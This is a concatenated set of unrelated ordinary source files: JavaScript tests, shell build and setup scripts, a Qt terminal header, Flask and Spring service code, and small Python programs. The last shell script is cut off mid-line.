it('should render an input text', () => {
const wrapper = renderComponent();
const input = wrapper.find(InputText);
expect(input).toHaveLength(1);
});
it('should render a date picker on input text click', () => {
const onChange = jest.fn();
const props = {
...defaultProps,
onChange,
value: moment(new Date(), 'YYYY-MM-DD'),
};
const wrapper = renderComponent(props);
const input = wrapper.find('input');
input.simulate('click');
const datePicker = wrapper.find(DayPickerSingleDateController);
expect(datePicker).toHaveLength(1);
});
it('should render onChange props on datepicker select', () => {
const onChange = jest.fn();
const props = {
...defaultProps,
onChange,
value: moment(new Date(), 'YYYY-MM-DD'),
};
const wrapper = renderComponent(props);
const input = wrapper.find('input');
input.simulate('click');
const datePicker = wrapper.find(DayPickerSingleDateController);
act(() => {
datePicker.props().onDateChange(moment('1993-07-05', 'YYYY-MM-DD'));
});
expect(onChange).toHaveBeenCalledWith({
target: {
name: 'date',
type: 'date',
value: moment('1993-07-05', 'YYYY-MM-DD'),
},
});
});
it('should display the date value in a human readable format', () => {
const onChange = jest.fn();
const props = {
...defaultProps,
onChange,
value: moment('1993-07-05', 'YYYY-MM-DD'),
};
const wrapper = renderComponent(props);
const input = wrapper.find('input');
expect(input.props().value).toBe('July 05, 1993');
});
it('should use the defaultProps', () => {
const {
defaultProps: { onChange },
} = DatePicker;
expect(onChange).toBeDefined();
});
});
|
#!/bin/bash
# Automated regeneration of sample course data
########################################################################
EXTRA=
while :; do
case $1 in
--no_submissions)
EXTRA="--no_submissions"
;;
*) # No more options, so break out of the loop.
break
esac
shift
done
# If any command fails, we need to bail
set -ev
# this script must be run by root or sudo
if [[ "$UID" -ne "0" ]] ; then
echo "ERROR: This script must be run by root or sudo"
exit 1
fi
# Get into the script's directory
DIR=`echo $0 | sed -E 's/\/[^\/]+$/\//'`
if [ "X$0" != "X$DIR" ]; then
cd "$DIR"
fi
# GIT_CHECKOUT/Submitty/.setup/bin -> GIT_CHECKOUT/Submitty
cd ../../
# python3 ./.setup/bin/partial_reset.py
python3 ./.setup/bin/setup_sample_courses.py ${EXTRA}
PHP_VERSION=$(php -r 'print PHP_MAJOR_VERSION.".".PHP_MINOR_VERSION;')
service php${PHP_VERSION}-fpm restart
DAEMONS=( submitty_websocket_server submitty_autograding_shipper submitty_autograding_worker submitty_daemon_jobs_handler )
for i in "${DAEMONS[@]}"; do
systemctl start ${i}
done
|
#!/bin/bash
make_cmd="make"
guid="1"
uid="1"
for i in "$@"
do
case $i in
-j=*|--threads=*)
make_cmd="make -j ${i#*=}"
;;
-g=*|--guid=*)
guid="${i#*=}"
;;
-u=*|--uid=*)
uid="${i#*=}"
;;
*)
# unknown option skip
;;
esac
done
cd /GrammarEngine/src/build && \
echo "=== Try to pull new version... ===" && \
git pull && \
echo "=== Generate makefiles with cmake ===" && \
cmake .. && \
echo "=== Build ===" && \
$make_cmd && \
echo "=== Copy include and libs files ===" && \
mkdir -p /out/include && \
mkdir -p /out/bin && \
mkdir -p /out/dict && \
mkdir -p /out/lib && \
cp ../lib64/*.so /out/lib && \
cp -r ../include/ /out/ && \
find ../exe64 -executable -type f -execdir sh -c 'cp {} "/out/bin/$(basename {})"' \; && \
cp ../bin-linux64/* /out/dict/ && \
echo "=== Chown with passed uid and guid ===" && \
chown -R "$uid":"$guid" /out/* && \
echo "=== Done ==="
|
<filename>qlightterminal.h
/*
* Copyright© <NAME> <<EMAIL>>
*/
#ifndef QLIGHTTERMINAL_H
#define QLIGHTTERMINAL_H
#include <QWidget>
#include <QStringList>
#include <QScrollBar>
#include <QHBoxLayout>
#include <QKeyCombination>
#include <QTimer>
#include <QPointF>
#include <QTime>
#include <QColor>
#include "st.h"
typedef struct {
Qt::Key key;
Qt::KeyboardModifier mods;
char cmd[7];
size_t cmd_size;
int nextKey;
} SpecialKey;
typedef struct {
int width;
int height;
int viewPortHeight; // number of lines visible
int viewPortWidth; // number of characters per line
int scrollMultiplier; // allows for smooth scrolling
int fontSize;
double lineheight;
double lineHeightScale;
double charHeight;
double charWith;
int vPadding;
int hPadding;
} Window;
class QLightTerminal : public QWidget {
Q_OBJECT
public:
QLightTerminal(QWidget *parent = nullptr);
public
slots:
void updateTerminal(Term * term);
/*
* Scrolls the terminal vertically to the given offset
* Max scroll height is the max line count multiplied by win.scrollMultiplier
*/
void scrollX(int x);
void setFontSize(int size, int weight = 500);
void setBackground(QColor color);
void setLineHeightScale(double lineHeight);
void setPadding(double vertical, double horizontal);
void close();
signals:
void s_closed(); // emitted when the terminal is closed
void s_error(QString);
protected:
void keyPressEvent(QKeyEvent *event) override;
void resizeEvent(QResizeEvent *event) override;
void wheelEvent(QWheelEvent *event) override;
void focusOutEvent(QFocusEvent *event) override;
void mousePressEvent(QMouseEvent *event) override;
void mouseDoubleClickEvent(QMouseEvent *event) override;
void mouseReleaseEvent(QMouseEvent *event) override;
void mouseMoveEvent(QMouseEvent *event) override;
bool focusNextPrevChild(bool next) override;
void paintEvent(QPaintEvent *event) override;
private:
SimpleTerminal *st;
QScrollBar scrollbar;
QHBoxLayout boxLayout;
QTimer cursorTimer;
QTimer selectionTimer;
QTimer resizeTimer;
Window win;
double cursorVisible = true;
void setupScrollbar();
void updateStyleSheet();
void updateSelection();
void resize();
bool closed = false;
qint64 lastClick = 0;
bool mouseDown = false;
bool selectionStarted = false;
QPointF lastMousePos; // last tracked mouse pos if mouse down
/*
* Special Keyboard Character
* TODO: Add more
*/
const int defaultBackground = 259;
constexpr static const SpecialKey
keys[25] = {
{ Qt::Key_Left, Qt::KeyboardModifier::NoModifier, "\033[D", 3, 4 },
{ Qt::Key_Left, Qt::ShiftModifier, "\033[1;2D", 7, 3 },
{ Qt::Key_Left, Qt::AltModifier, "\033[1;3D", 7, 2 },
{ Qt::Key_Left, Qt::ControlModifier, "\033[1;5D", 7, 1 },
{ Qt::Key_Up, Qt::NoModifier, "\033[A", 3, 4 },
{ Qt::Key_Up, Qt::ShiftModifier, "\033[1;2A", 7, 3 },
{ Qt::Key_Up, Qt::AltModifier, "\033[1;3A", 7, 2 },
{ Qt::Key_Up, Qt::ControlModifier, "\033[1;5A", 7, 1 },
{ Qt::Key_Right, Qt::NoModifier, "\033[C", 3, 4 },
{ Qt::Key_Right, Qt::ShiftModifier, "\033[1;2C", 7, 3 },
{ Qt::Key_Right, Qt::AltModifier, "\033[1;3C", 7, 2 },
{ Qt::Key_Right, Qt::ControlModifier, "\033[1;5C", 7, 1 },
{ Qt::Key_Down, Qt::NoModifier, "\033[B", 3, 4 },
{ Qt::Key_Down, Qt::ShiftModifier, "\033[1;2B", 7, 3 },
{ Qt::Key_Down, Qt::AltModifier, "\033[1;3B", 7, 2 },
{ Qt::Key_Down, Qt::ControlModifier, "\033[1;5B", 7, 1 },
{ Qt::Key_F1, Qt::NoModifier, "\033OP", 3, 1 },
{ Qt::Key_F2, Qt::NoModifier, "\033OQ", 3, 1 },
{ Qt::Key_F3, Qt::NoModifier, "\033OR", 3, 1 },
{ Qt::Key_F4, Qt::NoModifier, "\033OS", 3, 1 },
{ Qt::Key_F5, Qt::NoModifier, "\033[15~", 6, 1 },
{ Qt::Key_F6, Qt::NoModifier, "\033[17~", 6, 1 },
{ Qt::Key_F7, Qt::NoModifier, "\033[18~", 6, 1 },
{ Qt::Key_F8, Qt::NoModifier, "\033[19~", 6, 1 },
{ Qt::Key_F9, Qt::NoModifier, "\033[20~", 6, 1 },
};
/*
* Terminal colors (same as xterm)
*/
QColor colors[260] = {
// 8 normal Colors
QColor(0, 0, 0), // Black
QColor(240, 82, 79), // Red
QColor(98, 177, 32), // Green
QColor(166, 138, 13), // Yellow
QColor(57, 147, 212), // Blue
QColor(167, 113, 191), // Magenta
QColor(0, 163, 163), // Cyan
QColor(128, 128, 128), // Gray
// 8 bright colors
QColor(89, 89, 89), // Dark Gray
QColor(255, 64, 80), // Bright Red
QColor(79, 196, 20), // Bright Green
QColor(229, 191, 0), // Bright Yellow
QColor(31, 176, 225), // Bright Blue
QColor(237, 126, 237), // Bright Magenta
QColor(0, 229, 229), // Bright Cyan
QColor(255, 255, 255), // White
QColor(0, 0, 0),
QColor(0, 0, 95),
QColor(0, 0, 135),
QColor(0, 0, 175),
QColor(0, 0, 215),
QColor(0, 0, 255),
QColor(0, 95, 0),
QColor(0, 95, 95),
QColor(0, 95, 135),
QColor(0, 95, 175),
QColor(0, 95, 215),
QColor(0, 95, 255),
QColor(0, 135, 0),
QColor(0, 135, 95),
QColor(0, 135, 135),
QColor(0, 135, 175),
QColor(0, 135, 215),
QColor(0, 135, 255),
QColor(0, 175, 0),
QColor(0, 175, 95),
QColor(0, 175, 135),
QColor(0, 175, 175),
QColor(0, 175, 215),
QColor(0, 175, 255),
QColor(0, 215, 0),
QColor(0, 215, 95),
QColor(0, 215, 135),
QColor(0, 215, 175),
QColor(0, 215, 215),
QColor(0, 215, 255),
QColor(0, 255, 0),
QColor(0, 255, 95),
QColor(0, 255, 135),
QColor(0, 255, 175),
QColor(0, 255, 215),
QColor(0, 255, 255),
QColor(95, 0, 0),
QColor(95, 0, 95),
QColor(95, 0, 135),
QColor(95, 0, 175),
QColor(95, 0, 215),
QColor(95, 0, 255),
QColor(95, 95, 0),
QColor(95, 95, 95),
QColor(95, 95, 135),
QColor(95, 95, 175),
QColor(95, 95, 215),
QColor(95, 95, 255),
QColor(95, 135, 0),
QColor(95, 135, 95),
QColor(95, 135, 135),
QColor(95, 135, 175),
QColor(95, 135, 215),
QColor(95, 135, 255),
QColor(95, 175, 0),
QColor(95, 175, 95),
QColor(95, 175, 135),
QColor(95, 175, 175),
QColor(95, 175, 215),
QColor(95, 175, 255),
QColor(95, 215, 0),
QColor(95, 215, 95),
QColor(95, 215, 135),
QColor(95, 215, 175),
QColor(95, 215, 215),
QColor(95, 215, 255),
QColor(95, 255, 0),
QColor(95, 255, 95),
QColor(95, 255, 135),
QColor(95, 255, 175),
QColor(95, 255, 215),
QColor(95, 255, 255),
QColor(135, 0, 0),
QColor(135, 0, 95),
QColor(135, 0, 135),
QColor(135, 0, 175),
QColor(135, 0, 215),
QColor(135, 0, 255),
QColor(135, 95, 0),
QColor(135, 95, 95),
QColor(135, 95, 135),
QColor(135, 95, 175),
QColor(135, 95, 215),
QColor(135, 95, 255),
QColor(135, 135, 0),
QColor(135, 135, 95),
QColor(135, 135, 135),
QColor(135, 135, 175),
QColor(135, 135, 215),
QColor(135, 135, 255),
QColor(135, 175, 0),
QColor(135, 175, 95),
QColor(135, 175, 135),
QColor(135, 175, 175),
QColor(135, 175, 215),
QColor(135, 175, 255),
QColor(135, 215, 0),
QColor(135, 215, 95),
QColor(135, 215, 135),
QColor(135, 215, 175),
QColor(135, 215, 215),
QColor(135, 215, 255),
QColor(135, 255, 0),
QColor(135, 255, 95),
QColor(135, 255, 135),
QColor(135, 255, 175),
QColor(135, 255, 215),
QColor(135, 255, 255),
QColor(175, 0, 0),
QColor(175, 0, 95),
QColor(175, 0, 135),
QColor(175, 0, 175),
QColor(175, 0, 215),
QColor(175, 0, 255),
QColor(175, 95, 0),
QColor(175, 95, 95),
QColor(175, 95, 135),
QColor(175, 95, 175),
QColor(175, 95, 215),
QColor(175, 95, 255),
QColor(175, 135, 0),
QColor(175, 135, 95),
QColor(175, 135, 135),
QColor(175, 135, 175),
QColor(175, 135, 215),
QColor(175, 135, 255),
QColor(175, 175, 0),
QColor(175, 175, 95),
QColor(175, 175, 135),
QColor(175, 175, 175),
QColor(175, 175, 215),
QColor(175, 175, 255),
QColor(175, 215, 0),
QColor(175, 215, 95),
QColor(175, 215, 135),
QColor(175, 215, 175),
QColor(175, 215, 215),
QColor(175, 215, 255),
QColor(175, 255, 0),
QColor(175, 255, 95),
QColor(175, 255, 135),
QColor(175, 255, 175),
QColor(175, 255, 215),
QColor(175, 255, 255),
QColor(215, 0, 0),
QColor(215, 0, 95),
QColor(215, 0, 135),
QColor(215, 0, 175),
QColor(215, 0, 215),
QColor(215, 0, 255),
QColor(215, 95, 0),
QColor(215, 95, 95),
QColor(215, 95, 135),
QColor(215, 95, 175),
QColor(215, 95, 215),
QColor(215, 95, 255),
QColor(215, 135, 0),
QColor(215, 135, 95),
QColor(215, 135, 135),
QColor(215, 135, 175),
QColor(215, 135, 215),
QColor(215, 135, 255),
QColor(215, 175, 0),
QColor(215, 175, 95),
QColor(215, 175, 135),
QColor(215, 175, 175),
QColor(215, 175, 215),
QColor(215, 175, 255),
QColor(215, 215, 0),
QColor(215, 215, 95),
QColor(215, 215, 135),
QColor(215, 215, 175),
QColor(215, 215, 215),
QColor(215, 215, 255),
QColor(215, 255, 0),
QColor(215, 255, 95),
QColor(215, 255, 135),
QColor(215, 255, 175),
QColor(215, 255, 215),
QColor(215, 255, 255),
QColor(255, 0, 0),
QColor(255, 0, 95),
QColor(255, 0, 135),
QColor(255, 0, 175),
QColor(255, 0, 215),
QColor(255, 0, 255),
QColor(255, 95, 0),
QColor(255, 95, 95),
QColor(255, 95, 135),
QColor(255, 95, 175),
QColor(255, 95, 215),
QColor(255, 95, 255),
QColor(255, 135, 0),
QColor(255, 135, 95),
QColor(255, 135, 135),
QColor(255, 135, 175),
QColor(255, 135, 215),
QColor(255, 135, 255),
QColor(255, 175, 0),
QColor(255, 175, 95),
QColor(255, 175, 135),
QColor(255, 175, 175),
QColor(255, 175, 215),
QColor(255, 175, 255),
QColor(255, 215, 0),
QColor(255, 215, 95),
QColor(255, 215, 135),
QColor(255, 215, 175),
QColor(255, 215, 215),
QColor(255, 215, 255),
QColor(255, 255, 0),
QColor(255, 255, 95),
QColor(255, 255, 135),
QColor(255, 255, 175),
QColor(255, 255, 215),
QColor(255, 255, 255),
QColor(8, 8, 8),
QColor(18, 18, 18),
QColor(28, 28, 28),
QColor(38, 38, 38),
QColor(48, 48, 48),
QColor(58, 58, 58),
QColor(68, 68, 68),
QColor(78, 78, 78),
QColor(88, 88, 88),
QColor(98, 98, 98),
QColor(108, 108, 108),
QColor(118, 118, 118),
QColor(128, 128, 128),
QColor(138, 138, 138),
QColor(148, 148, 148),
QColor(158, 158, 158),
QColor(168, 168, 168),
QColor(178, 178, 178),
QColor(188, 188, 188),
QColor(198, 198, 198),
QColor(208, 208, 208),
QColor(218, 218, 218),
QColor(228, 228, 228),
QColor(238, 238, 238),
// Default colors
QColor(255, 255, 255),
QColor(85, 85, 85),
QColor(200, 200, 200), // Default font color
QColor(24, 24, 24) // Default background color
};
};
#endif // QLIGHTTERMINAL_H
|
from flask import request
from flask.json import jsonify
from flask_restful import Resource
from flask_pydantic import validate
from messenger.schema.job import RunSuiteBase, RunTemplateBase
from messenger.utils.response_util import RET
from celeryservice.tasks import run_suite, run_template
class RunSuiteEvent(Resource):
@validate()
def post(self, body: RunSuiteBase):
_body = body.__dict__
_user_id = _body.pop("user_id")
_user = {
"user_id": _user_id,
"auth": request.headers.get("authorization"),
}
run_suite.delay(_body, _user)
return jsonify(
error_code=RET.OK,
error_msg="succeed in creating the job for running suite"
)
class RunTemplateEvent(Resource):
@validate()
def post(self, body: RunTemplateBase):
_body = body.__dict__
_user_id = _body.pop("user_id")
_user = {
"user_id": _user_id,
"auth": request.headers.get("authorization"),
}
run_template.delay(_body, _user)
return jsonify(
error_code=RET.OK,
error_msg="succeed in creating the job for running template"
)
|
package com.javakc.pms.dispord.service;
import com.javakc.commonutils.jpa.base.service.BaseService;
import com.javakc.commonutils.jpa.dynamic.SimpleSpecificationBuilder;
import com.javakc.pms.dispord.dao.DispOrdDao;
import com.javakc.pms.dispord.entity.DispOrd;
import com.javakc.pms.dispord.vo.DispOrdQuery;
import org.springframework.data.domain.Page;
import org.springframework.data.domain.PageRequest;
import org.springframework.stereotype.Service;
import org.springframework.util.StringUtils;
import java.util.List;
@Service
public class DispOrdService extends BaseService<DispOrdDao,DispOrd> {
// @Autowired
// private DispOrdDao dispOrdDao;
/**
* 查询所有调度指令库
* @return
*/
public List<DispOrd> findAll() {
return dao.findAll();
}
public Page<DispOrd> findPage(DispOrdQuery dispOrdQuery, int pageNo, int pageSize){
SimpleSpecificationBuilder<DispOrd> simpleSpecificationBuilder=new SimpleSpecificationBuilder();
if (!StringUtils.isEmpty(dispOrdQuery.getOrderName()))
{
/**
* 可用操作符
* = 等值、!= 不等值 (字符串、数字)
* >=、<=、>、< (数字)
* ge,le,gt,lt(字符串)
* :表示like %v%
* l:表示 v%
* :l表示 %v
* null表示 is null
* !null表示 is not null
*/
simpleSpecificationBuilder.and("orderName", ":", dispOrdQuery.getOrderName());
}
if (!StringUtils.isEmpty(dispOrdQuery.getBeginDate())) {
simpleSpecificationBuilder.and("gmtCreate", "ge" , dispOrdQuery.getBeginDate());
}
if (!StringUtils.isEmpty(dispOrdQuery.getEndDate())) {
simpleSpecificationBuilder.and("gmtCreate", "lt", dispOrdQuery.getEndDate());
}
return dao.findAll(simpleSpecificationBuilder.getSpecification(), PageRequest.of(pageNo-1,pageSize));
}
} |
<filename>InteractiveProgramming/guess.py<gh_stars>0
# template for "Guess the number" mini-project
# input will come from buttons and an input field
# all output for the game will be printed in the console
import simplegui
import random
import math
range_low = 0
range_high = 100
use_random_range = False
secret_number = None
guesses_remaining = 0
# helper function to start and restart the game
def new_game():
global use_random_range
if use_random_range:
range_random()
else:
start_game()
def start_game():
global range
global guesses_remaining
computer_guess()
guesses_remaining = math.ceil(math.log(range_high-range_low+1,2))
print "Guess a number between ",range_low,"and",range_high-1
print "You have %d guesses remaining"%(guesses_remaining)
frame.start()
def computer_guess():
global secret_number
global range_low
global range_high
secret_number = random.randrange(range_low,range_high)
# define event handlers for control panel
def range100():
# button that changes the range to [0,100) and starts a new game
global range_low
global range_high
global use_random_range
use_random_range=False
range_low=0
range_high=100
new_game()
def range1000():
# button that changes the range to [0,1000) and starts a new game
global range_low
global range_high
global use_random_range
use_random_range=False
range_low=0
range_high=1000
new_game()
def range_random():
# button that changes the range to [x,y] and starts a game
global range_low
global range_high
global use_random_range
use_random_range=True
range_low = random.randrange(0,1000)
range_high = range_low + 100 + random.randrange(0,900)
start_game()
def input_guess(guess):
# main game logic goes here
global secret_number
global guesses_remaining
try:
guess = float(guess)
except:
print "Enter a number and try again"
return
else:
print "You guessed",guess
if guess == secret_number:
print "Correct"
new_game()
return
guesses_remaining -= 1
if guesses_remaining <= 0:
print "Sorry! You ran out of guesses, my number was %d, let's play again."%(secret_number)
new_game()
return
if guess > secret_number:
print "You have %d guesses remaining, my number is lower"%(guesses_remaining)
else:
print "You have %d guesses remaining, my number is higher"%(guesses_remaining)
# create frame
frame = simplegui.create_frame("Guess Number",300,300)
# register event handlers for control elements and start frame
frame.add_button("Range: 0 - 100", range100, 150)
frame.add_button("Range: 0 - 1000", range1000, 150)
frame.add_button("Range: x - y (both random)", range_random, 150)
frame.add_input("Guess: ",input_guess, 100)
# call new_game
new_game()
# always remember to check your completed program against the grading rubric
|
#!/bin/bash
# Helper utilities for build
PYTHON_DOWNLOAD_URL=https://www.python.org/ftp/python
OPENSSL_DOWNLOAD_URL=http://www.openssl.org/source
GET_PIP_URL=https://bootstrap.pypa.io/get-pip.py
function check_var {
if [ -z "$1" ]; then
echo "required variable not defined"
exit 1
fi
}
function lex_pyver {
# Echoes Python version string padded with zeros
# Thus:
# 3.2.1 -> 003002001
# 3 -> 003000000
echo $1 | awk -F "." '{printf "%03d%03d%03d", $1, $2, $3}'
}
function do_cpython_build {
local py_ver=$1
check_var $py_ver
local ucs_setting=$2
check_var $ucs_setting
tar -xzf Python-$py_ver.tgz
pushd Python-$py_ver
if [ "$ucs_setting" = "none" ]; then
unicode_flags=""
dir_suffix=""
else
local unicode_flags="--enable-unicode=$ucs_setting"
local dir_suffix="-$ucs_setting"
fi
local prefix="/opt/_internal/cpython-${py_ver}${dir_suffix}"
sudo mkdir -p ${prefix}/lib
sudo chown vagrant:vagrant -R ${prefix}
# -Wformat added for https://bugs.python.org/issue17547 on Python 2.6
CFLAGS="-Wformat" ./configure --prefix=${prefix} --disable-shared $unicode_flags > /dev/null
make -j2 > /dev/null
make install > /dev/null
popd
rm -rf Python-$py_ver
# Some python's install as bin/python3. Make them available as
# bin/python.
if [ -e ${prefix}/bin/python3 ]; then
ln -s python3 ${prefix}/bin/python
fi
${prefix}/bin/python get-pip.py
${prefix}/bin/pip install wheel
local abi_tag=$(${prefix}/bin/python ${MY_DIR}/python-tag-abi-tag.py)
ln -s ${prefix} /opt/python/${abi_tag}
}
function build_cpython {
local py_ver=$1
check_var $py_ver
check_var $PYTHON_DOWNLOAD_URL
wget -q $PYTHON_DOWNLOAD_URL/$py_ver/Python-$py_ver.tgz
if [ $(lex_pyver $py_ver) -lt $(lex_pyver 3.3) ]; then
do_cpython_build $py_ver ucs2
do_cpython_build $py_ver ucs4
else
do_cpython_build $py_ver none
fi
rm -f Python-$py_ver.tgz
}
function build_cpythons {
check_var $GET_PIP_URL
curl -sLO $GET_PIP_URL
for py_ver in $@; do
build_cpython $py_ver
done
rm get-pip.py
}
function do_openssl_build {
./config no-ssl2 no-shared -fPIC --prefix=/usr/local/ssl > /dev/null
make > /dev/null
sudo make install > /dev/null
}
function check_sha256sum {
local fname=$1
check_var ${fname}
local sha256=$2
check_var ${sha256}
echo "${sha256} ${fname}" > ${fname}.sha256
sha256sum -c ${fname}.sha256
rm ${fname}.sha256
}
function build_openssl {
local openssl_fname=$1
check_var ${openssl_fname}
local openssl_sha256=$2
check_var ${openssl_sha256}
check_var ${OPENSSL_DOWNLOAD_URL}
curl -sLO ${OPENSSL_DOWNLOAD_URL}/${openssl_fname}.tar.gz
check_sha256sum ${openssl_fname}.tar.gz ${openssl_sha256}
tar -xzf ${openssl_fname}.tar.gz
(cd ${openssl_fname} && do_openssl_build)
rm -rf ${openssl_fname} ${openssl_fname}.tar.gz
}
|
//Timer element
const timerElement = document.getElementById('timer');
//Start the timer
let countdown = 60;
const timer = setInterval(() => {
timerElement.innerHTML = countdown--;
if (countdown < 0) {
countdown = 60;
}
}, 1000); |
TERMUX_PKG_HOMEPAGE=https://neovim.io/
TERMUX_PKG_DESCRIPTION="Ambitious Vim-fork focused on extensibility and agility (nvim)"
TERMUX_PKG_LICENSE="Apache-2.0"
TERMUX_PKG_MAINTAINER="@termux"
TERMUX_PKG_VERSION=0.4.4
TERMUX_PKG_REVISION=2
TERMUX_PKG_SRCURL=https://github.com/neovim/neovim/archive/v${TERMUX_PKG_VERSION}.tar.gz
TERMUX_PKG_SHA256=2f76aac59363677f37592e853ab2c06151cca8830d4b3fe4675b4a52d41fc42c
TERMUX_PKG_DEPENDS="libiconv, libuv, luv, libmsgpack, libandroid-support, libvterm, libtermkey, liblua53, libunibilium"
TERMUX_PKG_HOSTBUILD=true
TERMUX_PKG_EXTRA_CONFIGURE_ARGS="
-DENABLE_JEMALLOC=OFF
-DGETTEXT_MSGFMT_EXECUTABLE=$(which msgfmt)
-DGETTEXT_MSGMERGE_EXECUTABLE=$(which msgmerge)
-DGPERF_PRG=$TERMUX_PKG_HOSTBUILD_DIR/deps/usr/bin/gperf
-DLUA_PRG=$TERMUX_PKG_HOSTBUILD_DIR/deps/usr/bin/luajit
-DPKG_CONFIG_EXECUTABLE=$(which pkg-config)
-DXGETTEXT_PRG=$(which xgettext)
-DPREFER_LUA=ON
-DLUA_INCLUDE_DIR=$TERMUX_PREFIX/include/lua5.3
"
TERMUX_PKG_CONFFILES="share/nvim/sysinit.vim"
termux_step_host_build() {
termux_setup_cmake
mkdir -p $TERMUX_PKG_HOSTBUILD_DIR/deps
cd $TERMUX_PKG_HOSTBUILD_DIR/deps
cmake $TERMUX_PKG_SRCDIR/third-party
make -j 1
cd $TERMUX_PKG_SRCDIR
make CMAKE_EXTRA_FLAGS="-DCMAKE_INSTALL_PREFIX=$TERMUX_PKG_HOSTBUILD_DIR -DUSE_BUNDLED_LUAROCKS=ON" install
make distclean
rm -Rf build/
}
termux_step_pre_configure() {
TERMUX_PKG_EXTRA_CONFIGURE_ARGS+=" -DLUA_MATH_LIBRARY=$TERMUX_STANDALONE_TOOLCHAIN/sysroot/usr/lib/$TERMUX_HOST_PLATFORM/$TERMUX_PKG_API_LEVEL/libm.so"
}
termux_step_post_make_install() {
local _CONFIG_DIR=$TERMUX_PREFIX/share/nvim
mkdir -p $_CONFIG_DIR
cp $TERMUX_PKG_BUILDER_DIR/sysinit.vim $_CONFIG_DIR/
}
termux_step_create_debscripts() {
cat <<- EOF > ./postinst
#!$TERMUX_PREFIX/bin/sh
if [ "\$1" = "configure" ] || [ "\$1" = "abort-upgrade" ]; then
if [ -x "$TERMUX_PREFIX/bin/update-alternatives" ]; then
update-alternatives --install \
$TERMUX_PREFIX/bin/editor editor $TERMUX_PREFIX/bin/nvim 40
update-alternatives --install \
$TERMUX_PREFIX/bin/vi vi $TERMUX_PREFIX/bin/nvim 15
fi
fi
EOF
cat <<- EOF > ./prerm
#!$TERMUX_PREFIX/bin/sh
if [ "\$1" != "upgrade" ]; then
if [ -x "$TERMUX_PREFIX/bin/update-alternatives" ]; then
update-alternatives --remove editor $TERMUX_PREFIX/bin/nvim
update-alternatives --remove vi $TERMUX_PREFIX/bin/nvim
fi
fi
EOF
} |
#!/bin/bash
### COLOR OUTPUT ###
ESeq="\x1b["
RCol="$ESeq"'0m' # Text Reset
# Regular Bold Underline High Intensity BoldHigh Intens Background High Intensity Backgrounds
Bla="$ESeq"'0;30m'; BBla="$ESeq"'1;30m'; UBla="$ESeq"'4;30m'; IBla="$ESeq"'0;90m'; BIBla="$ESeq"'1;90m'; On_Bla="$ESeq"'40m'; On_IBla="$ESeq"'0;100m';
Red="$ESeq"'0;31m'; BRed="$ESeq"'1;31m'; URed="$ESeq"'4;31m'; IRed="$ESeq"'0;91m'; BIRed="$ESeq"'1;91m'; On_Red="$ESeq"'41m'; On_IRed="$ESeq"'0;101m';
Gre="$ESeq"'0;32m'; BGre="$ESeq"'1;32m'; UGre="$ESeq"'4;32m'; IGre="$ESeq"'0;92m'; BIGre="$ESeq"'1;92m'; On_Gre="$ESeq"'42m'; On_IGre="$ESeq"'0;102m';
Yel="$ESeq"'0;33m'; BYel="$ESeq"'1;33m'; UYel="$ESeq"'4;33m'; IYel="$ESeq"'0;93m'; BIYel="$ESeq"'1;93m'; On_Yel="$ESeq"'43m'; On_IYel="$ESeq"'0;103m';
Blu="$ESeq"'0;34m'; BBlu="$ESeq"'1;34m'; UBlu="$ESeq"'4;34m'; IBlu="$ESeq"'0;94m'; BIBlu="$ESeq"'1;94m'; On_Blu="$ESeq"'44m'; On_IBlu="$ESeq"'0;104m';
Pur="$ESeq"'0;35m'; BPur="$ESeq"'1;35m'; UPur="$ESeq"'4;35m'; IPur="$ESeq"'0;95m'; BIPur="$ESeq"'1;95m'; On_Pur="$ESeq"'45m'; On_IPur="$ESeq"'0;105m';
Cya="$ESeq"'0;36m'; BCya="$ESeq"'1;36m'; UCya="$ESeq"'4;36m'; ICya="$ESeq"'0;96m'; BICya="$ESeq"'1;96m'; On_Cya="$ESeq"'46m'; On_ICya="$ESeq"'0;106m';
Whi="$ESeq"'0;37m'; BWhi="$ESeq"'1;37m'; UWhi="$ESeq"'4;37m'; IWhi="$ESeq"'0;97m'; BIWhi="$ESeq"'1;97m'; On_Whi="$ESeq"'47m'; On_IWhi="$ESeq"'0;107m';
printSection() {
echo -e "${BIYel}>>>> ${BIWhi}${1}${RCol}"
}
info() {
echo -e "${BIWhi}${1}${RCol}"
}
success() {
echo -e "${BIGre}${1}${RCol}"
}
error() {
echo -e "${BIRed}${1}${RCol}"
}
errorAndExit() {
echo -e "${BIRed}${1}${RCol}"
exit 1
}
if [[ $# -ne 2 ]]; then
error "Not enough arguments"
error "Usage: ${0} <MANUFACTURER_URL> <DEVICE_MODEL>"
error "Example: ${0} http://fdo-manufacturer.portainer.io:8039 dell-optiplex-7090"
exit 1
fi
# https://github.com/secure-device-onboard/client-sdk-fidoiot/blob/master/docs/setup.md#3-setting-the-manufacturer-network-address
MANUFACTURER=${1}
info "Setting Manufacturer URL to ${MANUFACTURER}"
echo -n "${MANUFACTURER}" > data/manufacturer_addr.bin
# https://github.com/secure-device-onboard/client-sdk-fidoiot/blob/master/docs/setup.md#4-elliptic-curve-digital-signature-algorithm-ecdsa-private-key-file-generation
info "Generating private key"
utils/keys_gen.sh .
MODEL=${2}
info "Setting Model to ${MODEL}"
echo -n ${MODEL} > data/manufacturer_mod.bin
SERIAL=$(uuidgen | sed 's/-.*//')
info "Setting Serial Number to ${SERIAL}"
echo -n ${SERIAL} > data/manufacturer_sn.bin
info "Starting Device Initialization"
./build/linux-client
info "Device Initialization finished - Serial: ${SERIAL}" |
<reponame>campenr/ensparser
import unittest
import os.path
import pandas as pd
from multiplate import multiplateIO
TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), "test_data")
class TestIsInstance(unittest.TestCase):
def test_enspire_csv_parser(self):
"""Check that parsed EnSpire csv matches expected data"""
test_dir = os.path.join(TEST_DATA_DIR, "EnSpire")
input_data = multiplateIO.parse_csv(os.path.join(test_dir, "raw_plate_data_enspire.csv"), "enspire")
expected_data = pd.read_pickle(os.path.join(test_dir, "expected_plate_data.pkl"))
# input_data is an iterator with one item
for data_set in input_data:
self.assertTrue(data_set.equals(expected_data))
if __name__ == '__main__':
unittest.main() |
def f(x):
if x % 2 == 0:
return x // 2
else:
return 3 * x + 1
def collatz_sequence(n):
sequence = [n]
while n != 1:
n = f(n)
sequence.append(n)
print(*sequence)
# Example usage
collatz_sequence(6) |
MODELFILE_NAME="l2pool2d_test.tflite"
STATUS="disabled"
|
#!/bin/sh
set -e
make distclean -s
git clean -fdq
# git restore . -q |
#!/bin/bash
if [ $# -lt 2 ]
then
echo "usage: ./save runid label description"
echo " "
exit
fi
runid=$1
label=$2
if [ $# -ne 3 ]
then
read -p "Please describe label '$label': " -e label_description
else
